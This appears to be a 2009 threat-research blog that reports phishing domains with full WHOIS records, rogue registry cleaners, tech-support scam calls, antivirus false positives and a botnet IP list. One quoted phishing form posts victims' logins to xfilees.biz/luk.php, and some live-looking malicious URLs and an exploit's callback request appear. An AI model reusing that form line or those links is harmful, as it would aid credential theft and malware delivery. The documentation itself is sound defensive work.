Blog for hpHosts, and whatever else I feel like writing about ....

Friday, 31 July 2009

Twishing in China (aka the Twitter phishing campaign)

Holger over at MDL gave us a heads up about a Twitter phishing (I've dubbed it Twishing - because it sounded good) campaign hosted in China (where else). This particular one is located at (screenshot to the left);

secure-login.twitter.verifiylogin.com/twitter/

IP: 124.94.101.13

Domain Name : verifiylogin.com
PunnyCode : verifiylogin.com


Registrant:
Organization : zhang xiaohu
Name : zhang xiaohu
Address : changningzhonghuainanlu192hao
City : changning
Province/State : Hunan
Country : CN
Postal Code : 421500

Administrative Contact:
Name : zhang xiaohu
Organization : zhang xiaohu
Address : changningzhonghuainanlu192hao
City : changning
Province/State : Hunan
Country : CN
Postal Code : 421500
Phone Number : 86-0734-3211451
Fax : 86-0734-3211451
Email : zhangxiaohu_0098@126.com

Technical Contact:
Name : zhang xiaohu
Organization : zhang xiaohu
Address : changningzhonghuainanlu192hao
City : changning
Province/State : Hunan
Country : CN
Postal Code : 421500
Phone Number : 86-0734-3211451
Fax : 86-0734-3211451
Email : zhangxiaohu_0098@126.com

Billing Contact:
Name : zhang xiaohu
Organization : zhang xiaohu
Address : changningzhonghuainanlu192hao
City : changning
Province/State : Hunan
Country : CN
Postal Code : 421500
Phone Number : 86-0734-3211451
Fax : 86-0734-3211451
Email : zhangxiaohu_0098@126.com


WhoIs server: whois.paycenter.com.cn


Ref: http://hosts-file.net/?s=verifiylogin.com

These folks are also responsible for phishing scams targeting other social network sites such as MySpace (also valid without the sub-domain runaround);

vids.myspace.com.index.cfm.fuseaction.vids.individual.videoid-34118937searchidf1cdcded042465aba36-8189d15507af.verifiylogin.com



Which can also be found at:

Host: rnyspece.com
IP: 124.94.101.13

and

Host: *.39042084.com
IP: 122.141.85.2




Domain Name : rnyspece.com
PunnyCode : rnyspece.com


Registrant:
Organization : lixing
Name : lixing
Address : Shanghaihuashan street 2018
City : shixiaqu
Province/State : shanghaishi
Country : china
Postal Code : 200085

Administrative Contact:
Name : lixing
Organization : lixing
Address : Shanghaihuashan street 2018
City : shixiaqu
Province/State : shanghaishi
Country : china
Postal Code : 200085
Phone Number : 86-021-63936657
Fax : 86-021-63936657
Email : lixing688@gmail.com

Technical Contact:
Name : lixing
Organization : lixing
Address : Shanghaihuashan street 2018
City : shixiaqu
Province/State : shanghaishi
Country : china
Postal Code : 200085
Phone Number : 86-021-63936657
Fax : 86-021-63936657
Email : lixing688@gmail.com

Billing Contact:
Name : lixing
Organization : lixing
Address : Shanghaihuashan street 2018
City : shixiaqu
Province/State : shanghaishi
Country : china
Postal Code : 200085
Phone Number : 86-021-63936657
Fax : 86-021-63936657
Email : lixing688@gmail.com


WhoIs server: whois.paycenter.com.cn


DomainName : 39042084.com

RSP: China Springboard Inc.
URL: http://www.namerich.cn

Name Server......................NS1.333NNN333.COM
Name Server......................NS2.333NNN333.COM
Status...........................ok
Creation Date ..................2009-07-19
Expiration Date .................2010-07-19
Last Update Date ...............2009-07-19

Registrant ID ...................V-X-59425-16306
Registrant Name .................SONG BOLIANG
Registrant Organization .........SONG BOLIANG
Registrant Address ..............HUANZHUGUANGCHANG31
Registrant City..................QD
Registrant Province/State .......SD
Registrant Country Code .........CN
Registrant Postal Code ..........226016
Registrant Phone Number .........+86.053281241156
Registrant Fax ..................+86.053281241156
Registrant Email ................janeob@126.com

Administrative ID ...............V-X-59425-16306
Administrative Name .............SONG BOLIANG
Administrative Organization .....SONG BOLIANG
Administrative Address ..........HUANZHUGUANGCHANG31
Administrative City..............QD
Administrative Province/State ...SD
Administrative Country Code .....CN
Administrative Postal Code ......226016
Administrative Phone Number .....+86.053281241156
Administrative Fax ..............+86.053281241156
Administrative Email ............janeob@126.com

Billing ID ......................V-X-59425-16306
Billing Name ....................SONG BOLIANG
Billing Organization ............SONG BOLIANG
Billing Address .................HUANZHUGUANGCHANG31
Billing City.....................QD
Billing Province/State ..........SD
Billing Country Code ............CN
Billing Postal Code .............226016
Billing Phone Number ............+86.053281241156
Billing Fax .....................+86.053281241156
Billing Email ...................janeob@126.com

Technical ID ....................V-X-59425-16306
Technical Name ..................SONG BOLIANG
Technical Organization...........SONG BOLIANG
Technical Address ...............HUANZHUGUANGCHANG31
Technical City...................QD
Technical Province/State.........SD
Technical Country Code ..........CN
Technical Postal Code ...........226016
Technical Phone Number ..........+86.053281241156
Technical Fax ...................+86.053281241156
Technical Email .................janeob@126.com



; Please register your domains at
; http://www.namerich.cn


WhoIs server: whois.namerich.cn

Thursday, 30 July 2009

RegCure peddled as Microsoft HotFix

I just came across this one on Google, via the sponsored adverts (surprise surprise), and am astounded that neither Google nor Paretologic have done anything about this one.

This particular site is peddling RegCure, claiming it's a Microsoft Hotfix. Not surprisingly, it also doesn't seem to care what terms you use to get to the page - aslong as you get there. For example, if I change error%201008.html to error%20i%20wanna%20kill%20rogues.html, we see;

http://microsoft.pcerror.info/errorcode/error%20i%20wanna%20kill%20rogues.html?gclid=CI__rpv1_psCFc0B4wod9Q8f-Q



You'll no doubt have guessed, all of the "awards" on the page are fake, as are the Microsoft Gold Certified "awards".

The download this site takes you to is;

http://www.pcerror.info/errorfix.exe

Which gives you a file called RegCureSetup_RW.exe. The little redirection wonderland you're taken through is;

http://bigbutton.paretologic.revenuewire.net/regcure/download
http://bigbutton.paretologic.safecart.com/regcure/download
http://www.regcure.com/download/revenuewire/
http://dl2.paretologic.com/downloads/regcure/RegCureSetup_RW.exe

Headers:

HTTP/1.1 302 Found
Date: Fri, 31 Jul 2009 02:52:16 GMT
Server: Apache
Location: http://bigbutton.paretologic.revenuewire.net/regcure/download
Connection: close
Content-Type: text/html; charset=iso-8859-1

HTTP/1.1 301 Moved Permanently
Date: Fri, 31 Jul 2009 02:53:10 GMT
Server: Apache
Location: http://bigbutton.paretologic.safecart.com/regcure/download
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 219
Connection: close
Content-Type: text/html; charset=iso-8859-1

HTTP/1.1 301 Moved Permanently
Date: Fri, 31 Jul 2009 02:53:45 GMT
Server: Apache
Set-Cookie: paretologic=3L4a6088fbba2ac21-bigbutton; expires=Wed, 21-Oct-2009 18:29:45 GMT; path=/; domain=.safecart.com
Location: http://www.regcure.com/download/revenuewire/
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 31 Jul 2009 02:54:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ADM OUR IND COM"
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.5
Set-Cookie: rwhop=active; expires=Sat, 31-Jul-2010 02:54:09 GMT; path=/; domain=regcure.com
Set-Cookie: rwtime=1249008849; expires=Sat, 31-Jul-2010 02:54:09 GMT; path=/; domain=regcure.com
Location: http://dl2.paretologic.com/downloads/regcure/RegCureSetup_RW.exe
Content-type: text/html


Just so we're clear - it's this type of behaviour that has not only gotten Paretologic a bad name, but has also gotten them blacklisted as rogues in many people's eye's (mine being one of them).

So who owns pcerror.info? Well, if you'd believed the About page, you'd have thought Paretologic themselves do, as the BBB accreditation links to a page that certifies Paretologic are accredited by the BBB;

http://www.pcerror.info/about.php

.. and the Contact page, that displays the Paretologic address;

http://www.pcerror.info/contact.php




However, I doubt Paretologic would do this themselves, especially given they know the security community are watching them like a hawk, given their past behaviour and lack of action concerning affiliates. In this case, I'm inclined to give the benefit of the doubt, and say an affiliate runs the site.

Not surprisingly, the WhoIs for pcerror.info, doesn't give us anything as that's hidden.

http://hosts-file.net/?s=pcerror.info&wn=1

References:

Paretologic vs MalwareURL
http://hphosts.blogspot.com/2009/07/paretologic-vs-malwareurl.html

SupportOnClick: Phoned by Malwarebytes? BigPond? Anyone else?

I wrote a few months ago, about a company called SupportOnClick, that had been reported as phoning people out of the blue, claiming their computers had told them their computers were infected.

A report on the Malwarebytes forums a little earlier, by an irate user, suggest this company is annoyingly, still using this ruse, to scam people out of money.

Research also shows SupportOnClick have called people claiming they work for BigPond.

Deciding enough was enough, again, I phoned SupportOnClick myself, on one of their UK numbers (01274 900834), to find out what they were playing at. I've never been so frustrated. The guy I spoke to, claimed they weren't claiming they were Malwarebytes, nor were they scamming people, but that they were simply calling existing customers - asked why thousands of reports suggest otherwise, he then proceeded to ask about me. After advising him of who I was (a Malwarebytes researcher, and owner of the hpHosts blacklist), he then proceeded to ask ME about a problem he was having with MBAM on HIS computer! I doubt he was being serious about this, and was instead, trying to guage my response. In either case, I refused to be sidetracked. Long story short, I got nowhere.

I've phoned Trading Standards again, to see if there is anything they can do, and alas, all I could do was file a report.

I'd like to advise ALL of you, if you receive one of these calls, please try and record it. Second, DO NOT allow them to connect to your computer, under any circumstances (they apparently use the LogMeIn service to do this), and DO NOT give them your credit card details - instead, simply hang up the phone.

If you do manage to get a recording of one of these calls, please send me a copy of it (or post it to the Malwarebytes forums), and additionally, if you are in the UK, report the company not only to Trading Standards and Watchdog, but to law enforcement aswell - the more we can do to get this company shut down, the better.

If you are in the US, report them to the FBI (I believe the BBB (Better Business Bureau) or Chamber of Commerce, will be able to take your report aswell).

For those in Australia, aswell as reporting it to law enforcement, you'll need to make sure you also report it to the ACCC (Australian Competition and Consumer Commission).

As a final note, you should also report it to your phone company!.

REMEMBER: Malwarebytes will NEVER telephone you! Further, any company phoning you to tell you your computer is infected or having problems is SCAMMING YOU


/edit 01-08-2009

Just an update, the user at the MBAM forums posted the details of the individual that phoned him;

Neil Berkman (not sure is spelling is correct)
employee ID 10655
1-800-698-9034
BOTNURSE

Note the number is SupportOnClick's toll free number (so feel free, for those in the US that get these calls, to call them on the 1800 number and give them a piece of your mind ;o)).

References:

Malwarebytes forums - BAD salesman
http://www.malwarebytes.org/forums/index.php?showtopic=20424

SupportOnClick update
http://hphosts.blogspot.com/2009/04/supportonclick-update.html

supportonclick.com scamming you by telephone!
http://hphosts.blogspot.com/2009/03/supportonclickcom-scamming-you-by.html

Scareware scammers adopt cold call tactics
http://www.theregister.co.uk/2009/04/10/supportonclick_scareware_scam

Monday, 27 July 2009

Rogue RegTidy/RegistryConvoy: Would you let him do your marketing?

I certainly wouldn't, not if the following is anything to go by. This all started after the members of WoT (Web of Trust), came across his site and flagged it as rogue. Nigel Lew, who runs marketing firm "J.N. Lew Design Group" popped along to tell all of us lowly folk that his company does the marketing for RegTidy and that it wasn't a rogue.

You can forgive him for not knowing that in Windows, REGTIDY.DLL <> RegTidy.dll (only Linux/MAC's are case sensitive). But from here I'm afraid, it goes downhill. His first mistake of course, was assuming that us lowly folk don't actually know what we're doing, or as he put it;

Hi, my job is brand management. That is what I was referring to. Its abundantly clear that most of you folks don't do this for money.

I do however handle this sort of IT stuff, I am looking at the flippen source code as we speak. I think I have a much better handle on what said file does than noobs and folks that don't know how to sandbox an app or run a VM.

And like I said, you folks provided me with weeks of damage control, for that, I thank you kindly :)


When pointed out to him that RegTidy was also known as RegistryConvoy, he suggested that it was simply because the latter was being rebranded due to a previous marketing company going nuts - suggesting to him that this was infact a load of codswollap as both had only existed for a matter of weeks (regtidy.com created 2009-07-07, with registryconvoy.com created 2009-06-11), he then decided that actually, it was because;

The latter is a much better name, period. That is not rocket science.


I'll let you draw your own conclusions of his proclaiming he's not a programmer, but had the source code in front of him and could tell it was legit.

Progressing further, I decided enough was enough and posted my own test results (he somehow thought we'd not actually tested it and were just slating it for err .... ??), which were;

1. It claims errors exist even BEFORE it has actually scanned anything;

http://temerc.com/imgRegTidy_com_-_main_UI.gif

2. It listed over 400 "problems" that either didn't exist and/or, were NOT problems (infact, removal of some of the keys, including some of the EMPTY keys, would have crippled the system).

http://temerc.com/imgRegTidy_com_-_scan_results.gif

3. It provides no means of saving the results to a log for manual analysis

Ref:
http://www.mywot.com/en/forum/4013-regtidy-2009?comment=17751#comment-17751

Getting on a bit, Nigel then decided that actually, the program WAS displaying misleading behaviour and in his words;

Most if not all dodgy behavior has been removed from the app based on my consultations a week ago. I have no interest in marketing an app that is a load of crap. Most, if not all suspect marketing is in the middle of being removed and replaced with the ones for the corresponding app as we speak as well.


Nigel then informed us that the new version, complete with his suggestions, was now on the site ready for us.

So, latest download link can be found anywhere on regtidy.com it does not auto do shit except start with windows which is easily rectified in the properties like every other app on the planet from win messenger to data recovery stuff.


Alas however, I tested the "latest" version, and can only surmise that his claims of improvements were absolute tosh, the misleading behaviour was still there, as were the abundance of F/P's (F/P's that either led to keys not present, led to problems that weren't actually problems, or keys that if removed, would've crippled the system).

Nigel didn't like my results however, and decided he would backpeddle a bit, and tell me that actually, the new version was not on the site yet .... woops!. Questioning this however, showed that Nigel actually decided that profanity and threats of hanging my ass out in public, would be a better form of marketing.

Given the conversation thus far, I can't see this getting any better for poor Nigel as he simply doesn't seem to get it, instead trying to claim we're all n00bs that don't know anything and are basing our claims on the detections of one AV or another (since the conversation started, 3 more vendors now flag RegTidy and regtidy.com). He doesn't seem to understand that yes, most of us do this stuff as a hobby voluntarily, but some of us actually do this as a full time job, and we're damn well good at what we do (that's not to say we're not prone to mistakes, of course we are) and in this particular case, we're 100% correct - RegTidy/RegistryConvoy or whatever name they want to go with, IS A ROGUE.

What I do find intruiging, is that RegTidy's developers haven't bothered to comment whatsoever, instead deciding to leave it all to Nigel (damn sure if I was a legit vendor and someone was saying otherwise, I wouldn't care who I'd hired - I'd be the first to jump in to defend myself and my programs), which given what I've seen thus far, is going to have been a huge mistake on RegTidy's part.

You can read the full story at on the MyWot forums;

http://www.mywot.com/en/forum/4013-regtidy-2009

Sunday, 26 July 2009

F/P Central: ClamWin gone wild!

It seems ClamWin is on a roll as far as F/P's are concerned. I've got it set on a schedule to periodically scan my servers, and to my surprise, received the following via e-mail yesterday;

\Downloads\Extensions\vURL_Extension\vurl-1_1_0-setup.exe: Trojan.Delf-8426 FOUND
\AB_Extension_Pack\1_2_2\abep-1_2_2-setup.exe: Trojan.Delf-8426 FOUND
\Cookie_Info\1_1_3\cookieinfo-1_1_3-basic.exe: Trojan.Delf-8426 FOUND
\Cookie_Info\1_1_3\cookieinfo-1_1_3-full.exe: Trojan.Delf-8426 FOUND
\Cookie_Info\1_1_4\cookieinfo-1_1_4-basic.exe: Trojan.Delf-8426 FOUND
\Cookie_Info\1_1_4\cookieinfo-1_1_4-full.exe: Trojan.Delf-8426 FOUND
\Cookie_Info\1_1_5\cookieinfo-1_1_5-basic.exe: Trojan.Delf-8426 FOUND
\Cookie_Info\1_1_5\cookieinfo-1_1_5-full.exe: Trojan.Delf-8426 FOUND
\hpObserver\0_1_0\hpobserver0_1_0-basic.exe: Trojan.Delf-8426 FOUND
\hpObserver\0_1_1\hpobserver0_1_1-basic.exe: Trojan.Delf-8426 FOUND
\hpObserver\0_1_2\hpobserver0_1_2-basic.exe: Trojan.Delf-8426 FOUND
\PUI\1_1_7\puisetup.exe: Trojan.Delf-8426 FOUND
\PUI\1_1_7\puisetup_basic.exe: Trojan.Delf-8426 FOUND
\RF_Types\1_0_4\rft_setup.exe: Trojan.Delf-8426 FOUND
\RF_Types\1_0_4\rft_setup_basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_1_8\vurl_de-0_1_8-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_0\vurl_de-0_2_0-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_1\vurl_de-0_2_1-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_3\vurl_de-0_2_3-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_4\vurl_de-0_2_4-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_5\vurl_de-0_2_5-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_6\vurl_de-0_2_6-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_7\vurl_de-0_2_7-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_8\vurl_de-0_2_8-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_9\vurl_de-0_2_9-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_9\vurl_de-0_2_9-full.exe: Trojan.Delf-8426 FOUND
\vURL_Extension\vurl-1_1_0-setup.exe: Trojan.Delf-8426 FOUND


Evidently, highly concerned that an infection had wormed it's way onto my server, I checked the files dates, they hadn't changed - perhaps whatever it was, had infected the files, but left their dates as they were? Unusual but possible. I therefor downloaded myself a copy of the files, and checked them against my local (original) copy - no difference.

I'd already figured these were F/P's, but wanted to be 100% sure. Checking the files showed they were indeed all F/P's - evidently highly annoyed me. I tried submitting the file via the ClamWin F/P report form - no go, claimed the file wasn't password protected (yes it damn well was), so I tried e-mailing it - nope, got returned to me with a delivery report error due to the attachment. As a last ditch attempt, I forwarded it directly to the e-mail address that clamwin@clamwin.com forwards all e-mail to (didn't realise it did until I got the delivery report) - no error returned, no response - I figured it was being ignored.

Low and behold, ClamWin just updated itself a few minutes ago and surprise surprise, these F/P's are now fixed. Obviously this is a good thing, but I'm surprised it only picked on these files, and frustrated that not only did I not get a response from ClamWin, but that these F/P's are becoming increasingly common for ClamWin lately.

Dear Tagged .... weren't you already being sued for this?

Evidently Tagged's being sued, isn't going to stop them from spamming out fake invites.


Little hint to Mr Tagged: since I've never registered for your service, and you've sent this to an e-mail address that I've never used for err, e-mail, I can only surmise you nicked the details when you scammed one of my friends/family members into registering and they were gullible enough to hand over their WLM credentials .... either way - spamming me was not a very bright idea, especially given you've just been sued for exactly this behaviour (don't worry, I'll be sure to let the NYAG know you've taken absolutely no notice of them).

References:

N.Y. Atorney General To Sue 'Tagged' Social Networking Site
http://www.crn.com/security/218401533;jsessionid=0JVVUYCMFA43AQSNDLPSKH0CJUNN2JVN

ClamWin + Notepad = Woops

ClamWin has developed yet another F/P, this time not very serious thankfully.

Interestingly, this only appears to be affecting my XP systems at present, the Vista system and servers are unaffected.

C:\WINDOWS\notepad.exe: Trojan.Zbot-5074 FOUND
C:\WINDOWS\ServicePackFiles\i386\notepad.exe: Trojan.Zbot-5074 FOUND
C:\WINDOWS\system32\notepad.exe: Trojan.Zbot-5074 FOUND

Saturday, 25 July 2009

Dear Yahoo, START READING! ABUSE! REPORTS!

Remember this?, it referenced a domain that was a part of an HM Revenue & Customs phishing scam. As the domain was hosted by yahoo (the domain in question is failing to resolve as of a few minutes ago), I decided to fire them an abuse report. Alas however, their first response was laughable as it showed they'd clearly not read the abuse report;

Hello,

Thank you for writing to Yahoo! Mail.

I understand your frustration in receiving unsolicited email. While we
investigate all reported violations against the Yahoo! Terms of Service
(TOS), in this particular case the message you received was not sent
through the Yahoo! Mail system.

Yahoo! has no control over activities outside its service, and therefore
we cannot take action. You may try contacting the sender's email
provider, by identifying the sender's domain and contacting the
administrator of that domain. The sender's provider should be in a
better position to take appropriate action against the sender's account.

The email message itself does contain some information relating to the
sender's identity. Yahoo! includes the originating Internet Protocol
(IP) address in the full Internet headers of all messages sent through
Yahoo! Mail, so that we will have information regarding the origin of
messages sent through our system. The originating IP address should be
located in the very last "Received" line of the full Internet headers
and corresponds to the sender's Internet Service Provider (ISP).

Please see the following URL for more assistance:

http://help.yahoo.com/l/us/yahoo/mail/original/abuse/abuse-17.htm

Once you have identified the IP address, you can conduct an IP lookup to
determine which ISP provides this person with Internet access. One such
lookup tool you may want to try is:

http://www.arin.net/whois/

You can then attempt to contact that ISP to report any abuse activities
occurring within their service.

In addition, please visit the following website for useful tools to
combat spam:

http://antispam.yahoo.com/

If we can be of further assistance, please let us know.

Your patience during this process is greatly appreciated.

Thank you again for contacting Yahoo! Mail.

Regards,

Cristene

Yahoo! Customer Care

62714199

For assistance with all Yahoo! services please visit:

http://help.yahoo.com/


What's actually more annoying than this, is that I received an automated response prior to receiving these, to let me know they'd received the report.

Frustrated with their response, I decided to reply with clarification that yes, I was aware that the e-mail had not originated from Yahoo, and that the domain in question (y'know, the damn thing I sent to their abuse dept!) WAS HOSTED BY YAHOO!. Given the netblock information for this particular IP space, only gives one Abuse e-mail address to send stuff too, it wasn't a case of my sending the abuse report to the wrong address.

Expecting to have someone actually bother to read my response, and then read the original damn report and respond to THAT, I was absolutely disgusted to have then received this, which came in a couple minutes ago;

Hello Steven,

Thank you for writing to Yahoo! Mail.

We understand your frustration in receiving unsolicited email. While we
investigate all reported violations against the Yahoo! Terms of Service
(TOS), in this particular case the message you received was not sent by
a Yahoo! Mail user.

Yahoo! has no control over activities outside its service, and therefore
we cannot take action. You may try contacting the sender's email
provider, by identifying the sender's domain and contacting the
administrator of that domain. The sender's provider should be in a
better position to take appropriate action against the sender's account.

The email message itself does contain some information relating to the
sender's identity. Yahoo! includes the originating Internet Protocol
(IP) address in the full Internet headers of all messages sent through
Yahoo! Mail, so that we will have information regarding the origin of
messages sent through our system. The originating IP address should be
located in the very last "Received" line of the full Internet headers
and corresponds to the sender's Internet Service Provider (ISP).

Please see the following URL for more assistance:

http://help.yahoo.com/help/us/mail/spam/spam-05.html

Once you have identified the IP address, you can conduct an IP lookup to
determine which ISP provides this person with Internet access. One such
lookup tool you may want to try is:

http://www.arin.net/whois/

You can then attempt to contact that ISP to report any abuse activities
occurring within their service.

If you are receiving multiple messages of this kind, you may utilize the
the "Blocked Addresses" feature of Yahoo! Mail in this instance. This
feature consists of a list of addresses that cannot send mail to your
account. Incoming mail from these addresses will be automatically
disposed of, without bouncing back to the sender. When you remove an
address from your Blocked Addresses list, you will once again be able to
receive mail from that address.

You can have up to 100 addresses on the Blocked Addresses list. To
manually add an address to the list of blocked addresses, simply follow
these steps:

1. Click "Mail Options", on the top right-hand navigation bar of your
Yahoo! Mail page.

2. Click "Block Addresses".

3. The list of addresses you are currently blocking will be displayed in
the Blocked Addresses window.

4. Enter the new address in the "Enter email address to block" field,
then click "Add Block".

5. That's it! The address will be added to your Blocked Addresses list,
and you will no longer receive messages from that address.

In addition, please visit the following website for useful tools to
combat spam:

http://antispam.yahoo.com/

If we can be of further assistance, please let us know.

Your patience during this process is greatly appreciated.

Thank you again for contacting Yahoo! Mail.

Regards,

Addley

Yahoo! Customer Care

62714199

For assistance with all Yahoo! services please visit:

http://help.yahoo.com/


Oh hell no - they didn't just reply to me with the same damn thing as last time did they? Yeppers - they did.

So I'd like to offer Yahoo some advice;

1. STOP using automated responses
2. STOP using form letters
3. READ THE DAMN REPORTS!!!!

Had they done #3, there would've been no need for #1 or #2.

References:

XFiles HMRC Phishing Campaign
http://hphosts.blogspot.com/2009/07/xfiles-hmrc-phishing-campaign.html

Friday, 24 July 2009

2 out of band Microsoft security updates

Microsoft Security Bulletin Advance Notification issued: July 24, 2009
Microsoft Security Bulletins to be issued: July 28, 2009


This is an advance notification of two out-of-band security bulletins that Microsoft is intending to release on July 28, 2009. One bulletin will be for the Microsoft Visual Studio product line; application developers should be aware of updates available affecting certain types of applications. The second bulletin contains defense-in-depth changes to Internet Explorer to address attack vectors related to the Visual Studio bulletin, as well as fixes for unrelated vulnerabilities that are rated Critical. Customers who are up to date on their security updates are protected from known attacks related to this out-of-band release.

This bulletin advance notification will be replaced with an update to the Microsoft Security Bulletin Summary for July 2009 on July 28, 2009. For more information about the bulletin advance notification service, see Microsoft Security Bulletin Advance Notification.


Read more
http://www.microsoft.com/technet/security/Bulletin/ms09-jul-ans.mspx

Part 2: Who is exploiting the Adobe Flash 0day

Part 2: Who is exploiting the Adobe Flash 0day

The new Flash 0-day has opened multiple avenues for malware authors. In my last article I showed how this vulnerability is being exploited via the PDF reader's support for SWF files. However, this vulnerability can just as easily be exploited in a standard drive-by fashion purely in Flash as well. This is precisely what has started to happen.

Here is the snippet of the javascript which is actively targeting this 0-day vulnerability.

This exploit successfully worked on my VM under Firefox 3.5.1 and Flash player 10. It worked smoothly and just before FireFox crashed, I saw an outbound communication like this:

GET /images/x/xor.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sorla.us
Connection: Keep-Alive


Read more
http://blog.fireeye.com/research/2009/07/who-is-exploiting-the-adobe-flash-0day-part-2.html

XFiles HMRC Phishing Campaign

No, not the Mulder and Scully XFiles, this is the xfilees.biz domain, hosted at Yahoo's AltaVista netblock.

Our dear phisher has made two mistakes here however, firstly, the .htm page attached to the e-mail, as you can see in the screenshot, is not presented properly (they forgot to base ref the HMRC domain, so it's not displayed properly). Secondly, HMRC NEVER sends out attachments such as this, and finally, they didn't bother checking who they're trying to phish - so I got a copy (woops!).

A quick look at the .htm's source code, instantly gives away who is responsible for this particular scam (and don't worry, I've notified HMRC, your hosting company, and of course the authorities);

<form name="logonForm" onsubmit="if (Validate()==false) return false;" action="http://www.xfilees.biz/luk.php" method="post">


The domain WhoIs shows little;

Domain Name: XFILEES.BIZ
Domain ID: D32902433-BIZ
Sponsoring Registrar: MELBOURNE IT LTD
Sponsoring Registrar IANA ID: 13
Domain Status: clientTransferProhibited
Registrant ID: B124834080000021
Registrant Name: Yuliya Trofimovic
Registrant Organization: Private Registration US
Registrant Address1: PO Box 61359
Registrant City: Sunnyvale
Registrant State/Province: CA
Registrant Postal Code: 94088
Registrant Country: United States
Registrant Country Code: US
Registrant Phone Number: +1.5105952002
Registrant Email: contact@myprivateregistration.com
Administrative Contact ID: B124834080000017
Administrative Contact Name: PrivateRegContact Admin
Administrative Contact Organization: Private Reg US
Administrative Contact Address1: PO Box 61359
Administrative Contact City: Sunnyvale
Administrative Contact State/Province: CA
Administrative Contact Postal Code: 94088
Administrative Contact Country: United States
Administrative Contact Country Code: US
Administrative Contact Phone Number: +1.5105952002
Administrative Contact Email: contact@myprivateregistration.com
Billing Contact ID: D124834010635579
Billing Contact Name: PrivateRegContact Bill
Billing Contact Organization: Private Reg US
Billing Contact Address1: PO Box 61359
Billing Contact City: Sunnyvale
Billing Contact State/Province: CA
Billing Contact Postal Code: 94088
Billing Contact Country: United States
Billing Contact Country Code: US
Billing Contact Phone Number: +1.5105952002
Billing Contact Email: contact@myprivateregistration.com
Technical Contact ID: B124834080000019
Technical Contact Name: PrivateRegContact TECH
Technical Contact Organization: Private Reg US
Technical Contact Address1: PO Box 61359
Technical Contact City: Sunnyvale
Technical Contact State/Province: CA
Technical Contact Postal Code: 94088
Technical Contact Country: United States
Technical Contact Country Code: US
Technical Contact Phone Number: +1.5105952002
Technical Contact Email: contact@myprivateregistration.com
Name Server: YNS1.YAHOO.COM
Name Server: YNS2.YAHOO.COM
Created by Registrar: MELBOURNE IT LTD
Last Updated by Registrar: MELBOURNE IT LTD
Domain Registration Date: Thu Jul 23 09:20:49 GMT 2009
Domain Expiration Date: Thu Jul 22 23:59:59 GMT 2010
Domain Last Updated Date: Thu Jul 23 09:20:55 GMT 2009


Notice the registration date? Yep, it was just created yesterday (aww and you gots blacklisted already?).

Little tip for you guys by the way, the IP block this one is hosted on, is also known for malware and exploits, so may aswell just blackhole it.

http://hosts-file.net/?s=216.39.57.104&view=matches

Thursday, 23 July 2009

DirectI: An update ....

I've received a response from Aman at DirectI concerning the domains we (as in, those of us in the sec com, not just me ;o)) found;

Dear Steven,

All domain names listed on the given posts, registered under registrar Public Domain Registry, are now suspended. Domains listed on http://msmvps.com/blogs/spywaresucks/archive/2009/07/22/1704910.aspx were taken down yesterday. Upon investigating further, we found a few more domain names registered in a similar manner, which are also now on hold. The registration pattern seems to be non-conventional and somehow these perpetrators managed to sneak in and register these domain names with different identities. We are still investigating these trends to beef up our internal tools to detect such registrations. For now, these customer accounts are frozen.

Most of these registrations were done during an ongoing promotional offer on .IN domain names. There are a quite a few domain names in the list that are registered with Sponsoring Registrar: Visesh Infotecnics Ltd. (R42-AFIN) who might also be running this promo offer. Please note that Visesh Infotecnics Ltd is an independent registrar using a management platform that we provide. We have forwarded them this list and asked them to take action according to their abuse policy.

Please be assured that our intentions and attitude towards abuse remains to be that of zero tolerance.

Our alert email address is precisely for sharing intelligence with us so that such issues can be nipped in the bud.

We look forward to your co-operation and understanding.

Best Regards;
Aman Masjide
DirectI Abuse Desk


I'm extremely happy to see they've not gone back to their old ways - major kudos to DirectI!

Is your computer part of the Alliance and Leicester phishing botnet?

I've been seeing these for several days now, and they seem to have a new one every day or two. Thus far, I've seen 9 different domains, all pointing to Alliance & Leicester phishing scam pages - but here's the kicker - they're ALL hosted on DRONE COMPUTERS! (otherwise known as, they've all been compromised and are now part of a botnet).

http://hosts-file.net/misc/hpObserver_-_Alliance_and_Leicester_com_phishing_Scams.html

Incidentally, there only seems to be a handful of IP's involved at present, which makes it a rather small and amateurish botnet:

138.210.155.220 - No PTR (Failed to resolve)
209.169.140.119 - 140-119.mc.royaume.com
200.204.145.250 - 200-204-145-250.speedyterra.com.br
219.83.125.242 - No PTR (Failed to resolve)
220.253.19.46 - 220-253-19-46.VIC.netspace.net.au
75.199.109.38 - 38.sub-75-199-109.myvzw.com
86.52.63.134 - 56343f86.rev.stofanet.dk
65.202.231.12 - No PTR (Failed to resolve)
203.208.84.7 - 7.84.208.203.cable.dyn.mql.ncable.com.au
74.130.145.52 - 74-130-145-52.dhcp.insightbb.com
78.106.123.116 - 78-106-123-116.broadband.corbina.ru
81.233.253.133 - 81-233-253-133-no13.tbcn.telia.com
97.90.152.194 - 97-90-152-194.static.mtpk.ca.charter.com
99.37.122.59 - adsl-99-37-122-59.dsl.chcgil.sbcglobal.net
24.8.130.146 - c-24-8-130-146.hsd1.co.comcast.net
68.54.210.173 - c-68-54-210-173.hsd1.in.comcast.net
68.61.133.232 - c-68-61-133-232.hsd1.mi.comcast.net
69.250.79.6 - c-69-250-79-6.hsd1.md.comcast.net
